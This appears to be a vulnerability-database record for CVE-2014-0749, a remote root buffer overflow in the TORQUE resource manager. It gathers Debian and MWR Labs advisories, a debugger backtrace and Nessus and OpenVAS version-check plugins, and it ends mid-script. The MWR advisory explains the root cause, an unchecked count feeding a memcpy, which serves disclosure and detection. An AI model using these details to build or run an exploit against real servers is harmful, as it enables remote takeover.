Stack-based buffer overflow in lib/Libdis/disrsi_.c in Terascale Open-Source Resource and Queue Manager (aka TORQUE Resource Manager) 2.5.x through 2.5.13 allows remote attackers to execute arbitrary code via a large count value.
{"securityvulns": [{"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-2936-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nMay 23, 2014 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : torque\r\nCVE ID : CVE-2014-0749\r\nDebian Bug : 748827\r\n\r\nJohn Fitzpatrick from MWR Labs reported a stack-based buffer overflow\r\nvulnerability in torque, a PBS-derived batch processing queueing system.\r\nAn unauthenticated remote attacker could exploit this flaw to execute\r\narbitrary code with root privileges.\r\n\r\nFor the oldstable distribution (squeeze), this problem has been fixed in\r\nversion 2.4.8+dfsg-9squeeze4.\r\n\r\nFor the stable distribution (wheezy), this problem has been fixed in\r\nversion 2.4.16+dfsg-1+deb7u3.\r\n\r\nFor the unstable distribution (sid), this problem has been fixed in\r\nversion 2.4.16+dfsg-1.4.\r\n\r\nWe recommend that you upgrade your torque packages.\r\n\r\nFurther information about Debian Security Advisories, how to apply\r\nthese updates to your system and frequently asked questions can be\r\nfound at: http://www.debian.org/security/\r\n\r\nMailing list: debian-security-announce@lists.debian.org\r\n\r\n", "cvss3": {}, "published": "2014-05-29T00:00:00", "type": "securityvulns", "title": "[SECURITY] [DSA 2936-1] torque security update", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-29T00:00:00", "id": "SECURITYVULNS:DOC:30762", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30762", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:14:15", "description": "Buffer overflow on task processing.", "cvss3": {}, "published": "2014-05-30T00:00:00", "type": "securityvulns", "title": "torque buffer overflow", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-30T00:00:00", "id": "SECURITYVULNS:VULN:13788", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13788", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:52", "description": "\r\n\r\nA buffer overflow exists in versions of TORQUE which can be exploited in order to remotely 
execute code from an unauthenticated perspective. This issue is exploitable in all versions of the 2.5 branch, up to and including 2.5.13.\r\n\r\nSoftware: TORQUE\r\nAffected Versions: All 2.5 releases up to and including 2.5.13\r\nCVE Reference: CVE-2014-0749\r\nAuthors: John Fitzpatrick (MWR Labs)\r\nSeverity: High Risk\r\nVendor: Adaptive Computing\r\nVendor Response: Incorporated MWR supplied fix into 2.5 development branch, no advisory\r\n\r\n[Description]\r\n\r\nA buffer overflow exists in older versions of TORQUE which can be exploited in order to remotely execute code from an unauthenticated perspective. This issue is exploitable in all versions of the 2.5 branch, up to and including 2.5.13.\r\n\r\n\r\n[Impact]\r\n\r\nSuccessful exploitation allows remote execution of code as root.\r\n\r\n\r\n[Cause]\r\n\r\nThis issue exists as a result of a misplaced bounds check.\r\n\r\n\r\n[Solution]\r\n\r\nDespite still being widely used, Torque 2.5.x is now end of life and no longer supported by Adaptive. The latest version of the 2.5 branch (2.5.13) is vulnerable to this issue. MWR have submitted a fix to the 2.5-dev GitHub repository (which is still active) which resolves this issue. It is strongly recommended that a version of 2.5-dev (later than pull request #171) is updated to.\r\n\r\nCode changes in the 4.2.x branch significantly enhance the security posture of TORQUE and so MWR would recommend updating to this branch if possible.\r\n\r\n\r\n[Technical Details]\r\n\r\nTORQUE is a widely used resource manager. There are several branches: 2.x, 3.x and 4.x. The code is open source, but maintained by Adaptive Computing.\r\nOperations such as job submissions and querying of job queues within TORQUE are handled by the pbs_server component. It was found that the pbs_server did not perform sufficient bounds checking on messages sent to it. As a result it was found to be possible to submit messages which resulted in an overflow leading to arbitrary code execution. 
This could be achieved from a remote, unauthenticated perspective regardless of whether the source IP address is permitted to submit jobs or not.\r\n\r\nThe vulnerability exists because the file disrsi_.c fails to ensure that the length of count (which is read from the request packet) is less than dis_umaxd prior to being used in a later memcpy(). As a result a specially crafted request can smuggle through a count value which is later decremented and becomes the ct value in a memcpy() made from within tcp_gets():\r\n\r\nmemcpy((char *)str, tp->tdis_leadp, ct);\r\n\r\nThis failure to validate count allows control over the size of the memcpy() to be leveraged and as a result control over the amount of data read from the remainder of the packet. If this value is large the memcpy() will overwrite the stack and so can be leveraged in order to gain control over the execution of the program.\r\n\r\nA backtrace showing the flow of execution is shown below:\r\n\r\n#0 0x0000003dd4a88b9a in memcpy () from /lib64/libc.so.6\r\n#1 0x00007fa0008cb65b in tcp_gets (fd=11, str=0x7fff8dfce741 '3' <repeats 26 times>,\r\n"Ab1Ab2Ab3",\r\nct=332) at ../Libifl/tcp_dis.c:567\r\n#2 0x00007fa0008be994 in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938,\r\ncount=333)\r\nat ../Libdis/disrsi_.c:187\r\n#3 0x00007fa0008bea1a in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938,\r\ncount=<value optimized out>) at ../Libdis/disrsi_.c:216\r\n#4 0x00007fa0008bea1a in disrsi_ (stream=11, negate=0x7fff8dfce93c, value=0x7fff8dfce938,\r\ncount=<value optimized out>) at ../Libdis/disrsi_.c:216\r\n#5 0x00007fa0008bdfab in disrfst (stream=11, achars=33, value=0x27f0b58 "")\r\nat ../Libdis/disrfst.c:125\r\n#6 0x00007fa0008c13ba in decode_DIS_ReqHdr (sock=11, preq=0x27f0b20,\r\nproto_type=0x7fff8dfce9dc,\r\nproto_ver=0x7fff8dfce9d8) at ../Libifl/dec_ReqHdr.c:141\r\n#7 0x0000000000409ba1 in dis_request_read (sfds=11, request=0x27f0b20) at dis_read.c:137\r\n#8 0x000000000041cb6e in 
process_request (sfds=11) at process_request.c:355\r\n#9 0x00007fa0008d4899 in wait_request (waittime=<value optimized out>, SState=0x72c258)\r\nat ../Libnet/net_server.c:508\r\n#10 0x000000000041afeb in main_loop () at pbsd_main.c:1203\r\n#11 0x000000000041bd15 in main (argc=<value optimized out>, argv=<value optimized out>)\r\nat pbsd_main.c:1760\r\n\r\nTORQUE is required to run as root and so successful exploitation leads to code execution as root. MWR have created a proof of concept exploit for TORQUE running on 64bit versions of CentOS which makes use of return oriented programming and ROP gadgets in order to execute arbitrary code as root. This vulnerability can be exploited reliably and remotely. It is possible to reach this path of execution from a remote and unauthenticated perspective (and regardless of whether the attacker's system is in the acl_hosts list or not). It is expected that code execution within a 32bit environment is simpler to achieve.\r\n\r\nWhilst the necessary bounds check was found to be missing from all versions of TORQUE reviewed, this issue was only found to be directly exploitable in the 2.5 branch; code changes which have taken place in the 4.x branches prevent the condition required for exploitation from being reached. The vulnerability exists because the necessary check on the size of count occurs too late within the disrsi_.c file. The fix is, therefore, to introduce the appropriate check on the size of \u201ccount\u201d. 
Replacing disrsi_.c with the patched 2.5-dev version (https://github.com/adaptivecomputing/torque/blob/2.5-dev/src/lib/Libdis/disrsi_.c) and recompiling should be sufficient to resolve this issue.\r\n\r\n\r\n[Detailed Timeline]\r\n\r\n2012: Vulnerability identified\r\n06/12/2012: Proof of concept developed\r\n22/07/2013: Vulnerability reported to Adaptive Computing\r\n20/08/2013: MWR requested update from Adaptive\r\n22/08/2013: Github pull request to resolve issue made by MWR with a fix\r\n21/01/2014: Further communication with Adaptive \r\n13/05/2014: Advisory published\r\n\r\n\r\n[Original Advisory]\r\n\r\nhttps://labs.mwrinfosecurity.com/system/assets/662/original/torque-buffer-overflow_2014-05-14.pdf\r\n\r\n", "cvss3": {}, "published": "2014-05-30T00:00:00", "type": "securityvulns", "title": "[CVE-2014-0749] TORQUE Buffer Overflow", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-30T00:00:00", "id": "SECURITYVULNS:DOC:30773", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30773", "sourceData": "", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2023-05-18T14:20:02", "description": "John Fitzpatrick from MWR Labs reported a stack-based buffer overflow vulnerability in torque, a PBS-derived batch processing queueing system. 
An unauthenticated remote attacker could exploit this flaw to execute arbitrary code with root privileges.", "cvss3": {}, "published": "2014-05-25T00:00:00", "type": "nessus", "title": "Debian DSA-2936-1 : torque - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:torque", "cpe:/o:debian:debian_linux:6.0", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-2936.NASL", "href": "https://www.tenable.com/plugins/nessus/74164", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-2936. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74164);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-0749\");\n script_bugtraq_id(67420);\n script_xref(name:\"DSA\", value:\"2936\");\n\n script_name(english:\"Debian DSA-2936-1 : torque - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing\nsystem. 
An unauthenticated remote attacker could exploit this flaw to\nexecute arbitrary code with root privileges.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=748827\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/squeeze/torque\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/torque\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-2936\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the torque packages.\n\nFor the oldstable distribution (squeeze), this problem has been fixed\nin version 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:torque\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:6.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/05/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"6.0\", prefix:\"libtorque2\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"libtorque2-dev\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-client\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-client-x11\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-common\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-mom\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-pam\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-scheduler\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"6.0\", prefix:\"torque-server\", reference:\"2.4.8+dfsg-9squeeze4\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtorque2\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"libtorque2-dev\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-client\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-client-x11\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-common\", 
reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-mom\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-pam\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-scheduler\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"torque-server\", reference:\"2.4.16+dfsg-1+deb7u3\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:25:42", "description": "The remote host is affected by the vulnerability described in GLSA-201412-47 (TORQUE Resource Manager: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in TORQUE Resource Manager. Please review the CVE identifiers referenced below for details.\n Impact :\n\n A context-dependent attacker may be able to gain escalated privileges, execute arbitrary code, or bypass security restrictions.\n Workaround :\n\n There is no known workaround at this time.", "cvss3": {}, "published": "2014-12-29T00:00:00", "type": "nessus", "title": "GLSA-201412-47 : TORQUE Resource Manager: Multiple vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-2193", "CVE-2011-2907", "CVE-2011-4925", "CVE-2013-4319", "CVE-2013-4495", "CVE-2014-0749"], "modified": "2021-01-06T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:torque"], "id": "GENTOO_GLSA-201412-47.NASL", "href": "https://www.tenable.com/plugins/nessus/80268", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201412-47.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed 
under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(80268);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2011-2193\", \"CVE-2011-2907\", \"CVE-2011-4925\", \"CVE-2013-4319\", \"CVE-2013-4495\", \"CVE-2014-0749\");\n script_bugtraq_id(48374, 49119, 51224, 62273, 63722, 67420);\n script_xref(name:\"GLSA\", value:\"201412-47\");\n\n script_name(english:\"GLSA-201412-47 : TORQUE Resource Manager: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201412-47\n(TORQUE Resource Manager: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in TORQUE Resource\n Manager. 
Please review the CVE identifiers referenced below for details.\n \nImpact :\n\n A context-dependent attacker may be able to gain escalated privileges,\n execute arbitrary code, or bypass security restrictions.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201412-47\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All TORQUE Resource Manager 4.x users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-cluster/torque-4.1.7'\n All TORQUE Resource Manager 2.x users should upgrade to the latest\n version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=sys-cluster/torque-2.5.13'\n NOTE: One or more of the issues described in this advisory have been\n fixed in previous updates. They are included in this advisory for the\n sake of completeness. It is likely that your system is already no longer\n affected by them.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:torque\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/12/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/12/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"sys-cluster/torque\", unaffected:make_list(\"ge 4.1.7\", \"rge 2.5.13\"), vulnerable:make_list(\"lt 4.1.7\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"TORQUE Resource Manager\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "debian": [{"lastseen": "2021-10-21T23:08:48", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2936-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMay 23, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : torque\nCVE ID : CVE-2014-0749\nDebian Bug : 748827\n\nJohn Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\nFor the unstable distribution (sid), this problem has been fixed 
in\nversion 2.4.16+dfsg-1.4.\n\nWe recommend that you upgrade your torque packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-05-23T09:19:39", "type": "debian", "title": "[SECURITY] [DSA 2936-1] torque security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-23T09:19:39", "id": "DEBIAN:DSA-2936-1:21E9F", "href": "https://lists.debian.org/debian-security-announce/2014/msg00117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-02T16:33:31", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2936-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMay 23, 2014 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : torque\nCVE ID : CVE-2014-0749\nDebian Bug : 748827\n\nJohn Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\n\nFor the oldstable distribution (squeeze), this problem has been fixed in\nversion 
2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\nWe recommend that you upgrade your torque packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {}, "published": "2014-05-23T09:19:39", "type": "debian", "title": "[SECURITY] [DSA 2936-1] torque security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0749"], "modified": "2014-05-23T09:19:39", "id": "DEBIAN:DSA-2936-1:16000", "href": "https://lists.debian.org/debian-security-announce/2014/msg00117.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2017-08-04T10:48:49", "description": "John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.", "cvss3": {}, "published": "2014-05-23T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2936-1 (torque - security update)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-0749"], "modified": "2017-07-20T00:00:00", "id": "OPENVAS:702936", "href": 
"http://plugins.openvas.org/nasl.php?oid=702936", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2936.nasl 6769 2017-07-20 09:56:33Z teissa $\n# Auto-generated from advisory DSA 2936-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"torque on Debian Linux\";\ntag_insight = \"The TORQUE server dispatches jobs across physically separated machines. 
It\nmay also be beneficial for single machines to organise the sequential execution\nof multiple jobs.\";\ntag_solution = \"For the oldstable distribution (squeeze), this problem has been fixed in\nversion 2.4.8+dfsg-9squeeze4.\n\nFor the stable distribution (wheezy), this problem has been fixed in\nversion 2.4.16+dfsg-1+deb7u3.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 2.4.16+dfsg-1.4.\n\nWe recommend that you upgrade your torque packages.\";\ntag_summary = \"John Fitzpatrick from MWR Labs reported a stack-based buffer overflow\nvulnerability in torque, a PBS-derived batch processing queueing system.\nAn unauthenticated remote attacker could exploit this flaw to execute\narbitrary code with root privileges.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702936);\n script_version(\"$Revision: 6769 $\");\n script_cve_id(\"CVE-2014-0749\");\n script_name(\"Debian Security Advisory DSA 2936-1 (torque - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-20 11:56:33 +0200 (Thu, 20 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-05-23 00:00:00 +0200 (Fri, 23 May 2014)\");\n script_tag(name: \"cvss_base\", value:\"10.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2936.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", 
value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"libtorque2\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libtorque2-dev\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-client-x11\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-common\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-mom\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-pam\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-scheduler\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"torque-server\", ver:\"2.4.8+dfsg-9squeeze4\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = 